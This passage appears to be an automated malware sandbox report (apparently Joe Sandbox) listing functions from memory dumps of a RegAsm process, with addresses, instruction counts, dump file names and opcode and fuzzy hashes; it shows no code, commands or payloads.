                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC9F48 Relevance: .1, Instructions: 109COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 137512c2d6b9995a83be9438b66376e9b0bb31f5a005c828c3ee280fdf4e41e8
                                                                                                                                    • Instruction ID: c804468360f157887ee92e1e09fa88c00831ef2b9a4f72f027574c289f760eb5
                                                                                                                                    • Opcode Fuzzy Hash: 137512c2d6b9995a83be9438b66376e9b0bb31f5a005c828c3ee280fdf4e41e8
                                                                                                                                    • Instruction Fuzzy Hash: 633179B2704119ABDB25DF2AC4506BF7BEFBFC5340B04846EE919CB244DE30D80183A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06855579 Relevance: .1, Instructions: 106COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 39c6417bf78e6b4e99905683af07a212ba8c52e2af66f19065f91993072c6172
                                                                                                                                    • Instruction ID: c707f3ec22b6370137bff9b53000880cc1b2288177031da0a8b62fe2a785dbc6
                                                                                                                                    • Opcode Fuzzy Hash: 39c6417bf78e6b4e99905683af07a212ba8c52e2af66f19065f91993072c6172
                                                                                                                                    • Instruction Fuzzy Hash: 67317A35B012149FCB45DF38D8849AEBBB2FF89300B518569EA05CB366DB30ED05CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 016986B0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 79c1eea52fcf8f4f06951d3525882a9002395b74d437fd1f9c0c93c8278c1d41
                                                                                                                                    • Instruction ID: 1c22752bfeb0007effe2c36e544cd4d6c17630a9d38066cc27c6c83ae12ec114
                                                                                                                                    • Opcode Fuzzy Hash: 79c1eea52fcf8f4f06951d3525882a9002395b74d437fd1f9c0c93c8278c1d41
                                                                                                                                    • Instruction Fuzzy Hash: BC31D23460410A9FEB05AB29E8587FEBFBEFB8A245F04406AE505DF348DB35C815C7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05530BFC Relevance: .1, Instructions: 97COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6b006480ebe4d15c500ef329265590da656495ae3c3df85545d00b9c8127019b
                                                                                                                                    • Instruction ID: 549c11fb983d4723c7ee1b217940339299eda0e0541da18b64c98c0f71efed12
                                                                                                                                    • Opcode Fuzzy Hash: 6b006480ebe4d15c500ef329265590da656495ae3c3df85545d00b9c8127019b
                                                                                                                                    • Instruction Fuzzy Hash: 5F41F5B4900205DFDB14CF99C489AAAFBF5FF88314F24C559E519AB321D774A881CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F2E8 Relevance: .1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f440e4227920dd1862edbca21c40167204cbbc247a93f97c6423d640d29d3576
                                                                                                                                    • Instruction ID: 392a993c43af284744e42a35b58e5153626f07f08237cfdedc9367b329a389ce
                                                                                                                                    • Opcode Fuzzy Hash: f440e4227920dd1862edbca21c40167204cbbc247a93f97c6423d640d29d3576
                                                                                                                                    • Instruction Fuzzy Hash: 9331F834B042088FD758DF68D4A9A6E7BE6BF89710F140468E6069B7A4DE7A9C41CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694248 Relevance: .1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4c237430cdead60eaafb4cd40d297fdc0db69274b5d95ff756df2f6b6b0d4919
                                                                                                                                    • Instruction ID: 148e6939ff9bf14b2632a238c2fd8e3287e33299b4707e6d535488b7d24a1203
                                                                                                                                    • Opcode Fuzzy Hash: 4c237430cdead60eaafb4cd40d297fdc0db69274b5d95ff756df2f6b6b0d4919
                                                                                                                                    • Instruction Fuzzy Hash: 3941D0B0C00719CBDB24CFA9C884BDEBBB5FF45304F24806AD409AB255DBB56985CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 016948A1 Relevance: .1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 132254e27bfe2f7b5e2ac387903318530c12c887f5c51d5ab36b58b2ab1bb733
                                                                                                                                    • Instruction ID: 7a8de3f4da815d3af7ee0779202c81d06c8f774679ea309930f09ede3565ee26
                                                                                                                                    • Opcode Fuzzy Hash: 132254e27bfe2f7b5e2ac387903318530c12c887f5c51d5ab36b58b2ab1bb733
                                                                                                                                    • Instruction Fuzzy Hash: 83310631A012058FDB04DF6DD9946ED7BB7FFC8204B1A826AD401A7355DF34D841CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06855588 Relevance: .1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 61e0558eedbf3381763850b76b152c4b2b51e255230717d28e725cd9a0acd485
                                                                                                                                    • Instruction ID: 04aca9742400089c27c41f056b6e66701ab962d6efba8221c16f237d5e808605
                                                                                                                                    • Opcode Fuzzy Hash: 61e0558eedbf3381763850b76b152c4b2b51e255230717d28e725cd9a0acd485
                                                                                                                                    • Instruction Fuzzy Hash: 91317634B002149FCB45DF38D8849AEBBB2FF89341B508469EA06CB369DB31ED05CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC53F0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8669de2e3e4ec60a533e1efc2947a00b7050acd0f72bc479ef40621ba81b3fee
                                                                                                                                    • Instruction ID: 28a83ffa7d4e93b64f32da26102ec7fb7d446fa72031f2fb45a38561bacce18d
                                                                                                                                    • Opcode Fuzzy Hash: 8669de2e3e4ec60a533e1efc2947a00b7050acd0f72bc479ef40621ba81b3fee
                                                                                                                                    • Instruction Fuzzy Hash: FA31D871600201AFD718EF25E894A6A77A7FBC4311F604A2DE11A4F764DB70F8898B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695935 Relevance: .1, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e02b11f18ed7fbbbc4c1067e714dd504bd21f21975cab6b4a44887a68813191d
                                                                                                                                    • Instruction ID: 2ad7efd75afed8cbd4ab0d3fd9c9a7a1968d658e5544f5254e9c6bf7c65df3c0
                                                                                                                                    • Opcode Fuzzy Hash: e02b11f18ed7fbbbc4c1067e714dd504bd21f21975cab6b4a44887a68813191d
                                                                                                                                    • Instruction Fuzzy Hash: 5B41D0B0C00719CBDB24CFA9C984BDDBBB5FF45304F24805AD409AB255DB756985CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01699E98 Relevance: .1, Instructions: 93COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3c21cbd04432b6be0eeb08735351f74a6818188f6618304c6e57277f6b5ce6b
                                                                                                                                    • Instruction ID: 16b923c1667997dd4cfd0641ce85662dae9542e0af7085608e8e6dde1a3fd4fa
                                                                                                                                    • Opcode Fuzzy Hash: a3c21cbd04432b6be0eeb08735351f74a6818188f6618304c6e57277f6b5ce6b
                                                                                                                                    • Instruction Fuzzy Hash: DB319031D1024ACBCB00EFB8D8506DDB7B2FF99320F65871AE5247B284EB30A595CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068587A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 210b31feb007b138985323301df15cf265675e785daabee7d6c87498cb0a0d4f
                                                                                                                                    • Instruction ID: c13f9cf5bdc8fe8ab28b201a3db8ccd16a27fac6bceff38ef49164bc96aa64e9
                                                                                                                                    • Opcode Fuzzy Hash: 210b31feb007b138985323301df15cf265675e785daabee7d6c87498cb0a0d4f
                                                                                                                                    • Instruction Fuzzy Hash: 554110B1D00258DFDB14CFAAD980ADEBBF6EF88314F10802AE815B7250DB34A945CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553C401 Relevance: .1, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f7baac8d5db43d096b70d8926c1b24c6ef572295e36d2de2e0f6744fc54e6b7e
                                                                                                                                    • Instruction ID: f07a682a44d8055c3d41346f079a19a513a58f82cbea4efd8b4f7495d1bbc453
                                                                                                                                    • Opcode Fuzzy Hash: f7baac8d5db43d096b70d8926c1b24c6ef572295e36d2de2e0f6744fc54e6b7e
                                                                                                                                    • Instruction Fuzzy Hash: 8E2185303803021FE34976359854B3E6657EBC0290F58C93DD6128F2A8DD71DD4AC396
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACEDC0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2ed413ee9af7714ff49d5e4949c06ae5343bc79cc5e2d4894b0e2df5f1c3cbec
                                                                                                                                    • Instruction ID: f27e0cf4b2816c7a8d0d9550b3a91f0f8b4cfd654c670e2dc055e2e0695bb8c0
                                                                                                                                    • Opcode Fuzzy Hash: 2ed413ee9af7714ff49d5e4949c06ae5343bc79cc5e2d4894b0e2df5f1c3cbec
                                                                                                                                    • Instruction Fuzzy Hash: BC2138B170925AEFDB54EBB9D45026E7BAAFFC0350B24856ED5288B354DE309C01C3D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055372D0 Relevance: .1, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: af7999a06b20770591a616fd6caa833b51130e5240100998b337877e709526f1
                                                                                                                                    • Instruction ID: 1e11021535f3627531e845494755e0712240d89e5ca0319e0468b281b01c8a6c
                                                                                                                                    • Opcode Fuzzy Hash: af7999a06b20770591a616fd6caa833b51130e5240100998b337877e709526f1
                                                                                                                                    • Instruction Fuzzy Hash: 9D31DDB4E04249CBDB14CFAAD8856EDBBF2BF89300F14D42AD419AB254DB345A46CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 016948B0 Relevance: .1, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fe44484cddcced463d8f21432556001de3d22c4d9d769045e4e5256dbe59ee2c
                                                                                                                                    • Instruction ID: 53b0799214e323929648db2030cdb9029185e4d091463d938f70b180eca37933
                                                                                                                                    • Opcode Fuzzy Hash: fe44484cddcced463d8f21432556001de3d22c4d9d769045e4e5256dbe59ee2c
                                                                                                                                    • Instruction Fuzzy Hash: 9E31E330A012458FDB04DF7DD9946AEBBB7BFC9204B1A8269D001A7355DF34D841CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC3E89 Relevance: .1, Instructions: 88COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dc67580319be6d521d29fd1e2e5dabd8576c76d2d02ea796df058b09452d12d0
                                                                                                                                    • Instruction ID: 57de1db7bf8827f5089b6ed57cb84c43cd6c70ced74c8a6c7e29f6c5c5b58db4
                                                                                                                                    • Opcode Fuzzy Hash: dc67580319be6d521d29fd1e2e5dabd8576c76d2d02ea796df058b09452d12d0
                                                                                                                                    • Instruction Fuzzy Hash: F331BEF190035AEFDF10EFA9D5957EEBBB0AB44304F00842ED515AB381CB795845CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169CDF0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5eb3360507f406f6c312041c4d58be18353ed307635129a5c7efb39fd8aaee0d
                                                                                                                                    • Instruction ID: 8dbbbb42d82c805947f5adb5fa6fee183f887ec9e0b4fe16215a46d812326ea9
                                                                                                                                    • Opcode Fuzzy Hash: 5eb3360507f406f6c312041c4d58be18353ed307635129a5c7efb39fd8aaee0d
                                                                                                                                    • Instruction Fuzzy Hash: D32126317002064FEF14AB7994083FEBAAAAFC5340F84482DC2469B384EF74995687E2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F2D8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1c9f410e6b1de559799c892b17c1a74fda03fb64d47bd137f917bf322093ba2e
                                                                                                                                    • Instruction ID: e6cbd1f9f79e8272f560171f30cb10f74526f6fea52863aa24769fdfaf53ad87
                                                                                                                                    • Opcode Fuzzy Hash: 1c9f410e6b1de559799c892b17c1a74fda03fb64d47bd137f917bf322093ba2e
                                                                                                                                    • Instruction Fuzzy Hash: 47312D34B042089FD718DF68D499AAE7BF6BF8C710F14046CE50A9B7A5CB769C45CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACD858 Relevance: .1, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 88945dc9f02a5afd5bad863eebebf342231a7b482d40a85726ea1fda7c2fe1de
                                                                                                                                    • Instruction ID: 98bc9d720b8ca7b4f25822e7ba0351013bd28bbffb2184b2e309f5b47f7956a5
                                                                                                                                    • Opcode Fuzzy Hash: 88945dc9f02a5afd5bad863eebebf342231a7b482d40a85726ea1fda7c2fe1de
                                                                                                                                    • Instruction Fuzzy Hash: 74311CB5E04209EFCB04CFA8D9859AEBFF4FB89310F1091AAE915E7351D7309A45CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858797 Relevance: .1, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2ca398defffd1eb2f5fb39f9f9744c1120617a1cce86bb6830411c9b0d90ba4
                                                                                                                                    • Instruction ID: e8796c1f44ef3bbb8eb86ec97a82fab26fd93e91c702240c0286e6576292edcf
                                                                                                                                    • Opcode Fuzzy Hash: f2ca398defffd1eb2f5fb39f9f9744c1120617a1cce86bb6830411c9b0d90ba4
                                                                                                                                    • Instruction Fuzzy Hash: EF312EB1D002589FDB14CFAAC980ADEBBF6EF48314F10802AE814BB290DB349845CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05532570 Relevance: .1, Instructions: 79COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 15d9e81602299b074e6d41794c2de4fe25cd027779e99b116a20fc61c7def384
                                                                                                                                    • Instruction ID: 6a58e5329566b72a0aadaf19c95234f40c7ecd071eddc3704979eb6a96af3bcd
                                                                                                                                    • Opcode Fuzzy Hash: 15d9e81602299b074e6d41794c2de4fe25cd027779e99b116a20fc61c7def384
                                                                                                                                    • Instruction Fuzzy Hash: D1316174E0160ACBDB18EB64D5666EE7BB6BF49304F204829C406BB254CF719D45CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F968 Relevance: .1, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b18b0d42312691d8347dcdb140c47d1f6e48a74b06c02470662ac19ec523d93
                                                                                                                                    • Instruction ID: 0c743f4f56a5ab67d3bd2eb4554f7efa35f27d32c4169d7e9d2a3d80fac6e69e
                                                                                                                                    • Opcode Fuzzy Hash: 0b18b0d42312691d8347dcdb140c47d1f6e48a74b06c02470662ac19ec523d93
                                                                                                                                    • Instruction Fuzzy Hash: 75318531E0070A8BCB11AFB8D4141AEB3B2FF95310B10862DD55ABB750EF74A985CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858A98 Relevance: .1, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2dff019547ed83743f41c890fb4dc696805b655ffedf5e30c469b963512cb41
                                                                                                                                    • Instruction ID: da29e64a1afefcadf30cd5abd4dba334703489dfb2263e2c75cd327668f39c6f
                                                                                                                                    • Opcode Fuzzy Hash: f2dff019547ed83743f41c890fb4dc696805b655ffedf5e30c469b963512cb41
                                                                                                                                    • Instruction Fuzzy Hash: CC3102B1D01258DFDB14DFA9D890BDEBBB9EF48350F24842AE805F7240CB74A845CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858F43 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1e12e980f3e65788779b6b0552ba7cc531fb401a13bb7a0ecfb8cc9105bf96f6
                                                                                                                                    • Instruction ID: dfa3a21368ea50467868ff3a253764c897b06c5bdf9e87cf31173d75cb982ebe
                                                                                                                                    • Opcode Fuzzy Hash: 1e12e980f3e65788779b6b0552ba7cc531fb401a13bb7a0ecfb8cc9105bf96f6
                                                                                                                                    • Instruction Fuzzy Hash: EB313FB4D0526ADFCB40CFA8D484AEEBFB1FB09321F2041AAE915E7351D7341A81CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 015FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1860467083.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_15fd000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 97b3ce61beb5a86e6274b129d5365c8ce9f121bf6140659c7c2f72ecdb8ff480
                                                                                                                                    • Instruction ID: 370525de20472cad83895a48027662902dd839c54ad6f365eada3544cfe40aa2
                                                                                                                                    • Opcode Fuzzy Hash: 97b3ce61beb5a86e6274b129d5365c8ce9f121bf6140659c7c2f72ecdb8ff480
                                                                                                                                    • Instruction Fuzzy Hash: D3214571100200DFDB05DF48C9C8B6ABFB5FB84324F20C56DDA094F216C37AE446CAA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169DFEC Relevance: .1, Instructions: 74COMMON
                                                                                                                                    Download Yara Rule
